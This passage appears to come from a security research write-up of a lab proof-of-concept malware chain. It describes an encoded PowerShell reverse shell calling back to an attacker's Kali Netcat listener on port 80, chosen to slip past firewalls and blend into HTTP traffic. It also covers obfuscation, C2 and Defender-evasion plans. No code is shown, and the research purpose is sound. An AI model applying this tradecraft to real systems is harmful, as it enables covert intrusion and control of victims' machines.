A reverse TCP shell in the form of an encoded PowerShell command is launched. This shell attempts to connect to the IP address of the attacker’s Kali Linux machine on “public” IP 126.96.36.199 on port 80. The reason for using port 80 is that perimeter firewalls in enterprise configurations allow traffic on it, further, it has the added benefit that the shell is less likely to be detected in all of the regular HTTP traffic going in and out of a network.
On the Kali attacker machine, Netcat is configured as a verbose listener on port 80 and constantly waits for a connection from the target machine.
A successful connection provides a reverse shell to the compromised machine and control of the target is established:
Caveats for the payload:
- To allow easier understanding of the attack, none of the strings or source code were obfuscated, nor were any of the EXE files packed. In our experience with real attacks, heavy obfuscation -such as Invoke-Obfuscation, fileless processes, and packers would be utilized to prevent detection and analysis, amongst many other techniques.
- The encryption method uses a hard coded IV which would allow easy deciphering of the encrypted files. The intent of this project is a POC and not to create advanced encryption methods that prevent decryption.
- Additional functions, including detection of whether the processes are running on a virtual machine, allowing for staged updates and modification of C2s, and polymorphic file attributes, are currently underway.
- Cloud Detections for Windows Defender were enabled on this machine, however, there was no Internet connection to the outside world in the lab environment. It is possible that Windows Defender would have detected and stopped some of these processes based on behavioral analysis if there was an active Internet connection, necessitating additional steps to prevent detection.